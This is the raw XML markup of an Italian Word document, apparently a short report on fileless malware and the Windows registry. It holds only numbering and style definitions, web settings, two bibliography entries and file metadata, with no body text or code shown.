    <w:tmpl w:val="0044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96B7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C2A0FA8"/>
    <w:lvl w:ilvl="0" w:tplc="0410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964194A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D702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62685E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="545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F064C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94B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C586D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="445E3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495812"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1F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0156F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1390FD7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8147DBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59F8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26219"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23F60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A3A0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA143F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0131C7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C5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B161F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A64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B57B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3DAB19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267650E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="148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A7968"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF6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E02A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B76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F7FB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="708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C6A36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C88B57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168611A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1808E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6AF5C5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FAAE8C2"/>
    <w:lvl w:ilvl="0" w:tplc="D1042C56">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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="772F064C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B224C640"/>
    <w:lvl w:ilvl="0" w:tplc="17D6AB90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="000000" w:themeColor="text1"/>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405763203">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="62338613">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="993728766">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="7611432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340402470">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="840893291">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1137642995">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1901280077">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1505129166">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1966766617">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1079909917">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1981299414">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1699313517">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="998113943">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2034728165">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1215310160">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="480774904">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1595555786">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1238134191">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1038969861">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1410880810">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="2060012936">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="305207671">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1386561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58"/>
    <w:rsid w:val="000132E6"/>
    <w:rsid w:val="00065CDF"/>
    <w:rsid w:val="00071949"/>
    <w:rsid w:val="000D7F53"/>
    <w:rsid w:val="00105827"/>
    <w:rsid w:val="0011290F"/>
    <w:rsid w:val="00125DF2"/>
    <w:rsid w:val="00145803"/>
    <w:rsid w:val="00172077"/>
    <w:rsid w:val="00180850"/>
    <w:rsid w:val="00185E2B"/>
    <w:rsid w:val="001A1FCA"/>
    <w:rsid w:val="001A6736"/>
    <w:rsid w:val="001C73F0"/>
    <w:rsid w:val="00297E03"/>
    <w:rsid w:val="002A300D"/>
    <w:rsid w:val="002E7108"/>
    <w:rsid w:val="00372212"/>
    <w:rsid w:val="003861B7"/>
    <w:rsid w:val="00402416"/>
    <w:rsid w:val="00404CE1"/>
    <w:rsid w:val="0041086B"/>
    <w:rsid w:val="004410EE"/>
    <w:rsid w:val="004437DD"/>
    <w:rsid w:val="004624DF"/>
    <w:rsid w:val="00481516"/>
    <w:rsid w:val="004A60F7"/>
    <w:rsid w:val="004C1A8D"/>
    <w:rsid w:val="004C1E3B"/>
    <w:rsid w:val="004C295E"/>
    <w:rsid w:val="004C6185"/>
    <w:rsid w:val="00503649"/>
    <w:rsid w:val="00523F8E"/>
    <w:rsid w:val="00546861"/>
    <w:rsid w:val="005E2E89"/>
    <w:rsid w:val="00630F76"/>
    <w:rsid w:val="00676D58"/>
    <w:rsid w:val="006900E6"/>
    <w:rsid w:val="00700FBC"/>
    <w:rsid w:val="00756929"/>
    <w:rsid w:val="00766A68"/>
    <w:rsid w:val="007715AA"/>
    <w:rsid w:val="0079576D"/>
    <w:rsid w:val="007B69A1"/>
    <w:rsid w:val="007C4354"/>
    <w:rsid w:val="007E0C17"/>
    <w:rsid w:val="00805222"/>
    <w:rsid w:val="008A58C2"/>
    <w:rsid w:val="008C1163"/>
    <w:rsid w:val="00964EE8"/>
    <w:rsid w:val="009819F2"/>
    <w:rsid w:val="009D2495"/>
    <w:rsid w:val="00A11D1F"/>
    <w:rsid w:val="00A351D4"/>
    <w:rsid w:val="00A450D8"/>
    <w:rsid w:val="00A50725"/>
    <w:rsid w:val="00A75C3D"/>
    <w:rsid w:val="00A82548"/>
    <w:rsid w:val="00A95A34"/>
    <w:rsid w:val="00AB6F3F"/>
    <w:rsid w:val="00AC6EDB"/>
    <w:rsid w:val="00AC7CF6"/>
    <w:rsid w:val="00B3023D"/>
    <w:rsid w:val="00B951B4"/>
    <w:rsid w:val="00BA07F1"/>
    <w:rsid w:val="00C15012"/>
    <w:rsid w:val="00C31AC8"/>
    <w:rsid w:val="00C8302E"/>
    <w:rsid w:val="00C94CC0"/>
    <w:rsid w:val="00D81211"/>
    <w:rsid w:val="00DE028B"/>
    <w:rsid w:val="00E120F6"/>
    <w:rsid w:val="00E41993"/>
    <w:rsid w:val="00E70CA9"/>
    <w:rsid w:val="00E80709"/>
    <w:rsid w:val="00E97BB0"/>
    <w:rsid w:val="00EB6802"/>
    <w:rsid w:val="00EE4510"/>
    <w:rsid w:val="00EE72F4"/>
    <w:rsid w:val="00F5206B"/>
    <w:rsid w:val="00F7268D"/>
    <w:rsid w:val="00F85F18"/>
    <w:rsid w:val="00FA2A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CEB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{85F416BB-EAE7-4711-AC09-5A9C466E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76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76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76D5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76D5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76D5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76D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76D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76D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76D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76D5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76D5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76D5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76D5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76D5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76D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76D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76D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76D58"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="TitoloCarattere"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00676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76D5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76D5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76D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76D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76D58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00676D58"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00676D58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00676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76D58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentointenso">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00676D58"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliografia">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C1E3B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormaleWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00523F8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523F8E"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B951B4"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Menzionenonrisolta">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B951B4"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grigliatabellachiara">
    <w:name w:val="Grid Table Light"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="40"/>
    <w:rsid w:val="00FA2A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testazione">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="IntestazioneCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE028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E028B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pidipagina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="PidipaginaCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE028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E0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0915">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="117339079">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="202519508">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="218516755">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="609431508">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="761530889">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1529105488">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1702779942">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1802452200">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="181849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ver-remoto/payload.h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Mic25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6E257BE5-484A-4FD3-BA7D-6789BE9B90F6}</b:Guid>
    <b:Year>2025</b:Year>
    <b:LCID>it-IT</b:LCID>
    <b:Author>
      <b:Author>
        <b:Corporate>Microsoft</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Month>Gennaio</b:Month>
    <b:Day>15</b:Day>
    <b:URL>https://learn.microsoft.com/it-it/troubleshoot/windows-server/performance/windows-registry-advanced-users</b:URL>
    <b:Title>Informazioni sul Registro di sistema di Windows per gli utenti esperti</b:Title>
    <b:InternetSiteTitle>Microsoft Learn</b:InternetSiteTitle>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Spr20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{D47B82CA-CEB4-4781-9656-A79BD11CA790}</b:Guid>
    <b:Title>An emerging threat Fileless malware: a survey and research challenges</b:Title>
    <b:Year>2020</b:Year>
    <b:URL>https://link.springer.com/article/10.1186/s42400-019-0043-x</b:URL>
    <b:Author>
      <b:Author>
        <b:Corporate>Springer Nature</b:Corporate>
      </b:Author>
    </b:Author>
    <b:JournalName>Springer Nature Link</b:JournalName>
    <b:LCID>en-US</b:LCID>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FECABDFA-65E1-452A-9301-4120BD5EB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7767</TotalTime>
  <Pages>6</Pages>
  <Words>1181</Words>
  <Characters>6733</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>56</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Bellomo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>BELLOMO NICOLAS</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <cp:lastPrinted>2026-02-23T17:20:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-11T10:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-24T23:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>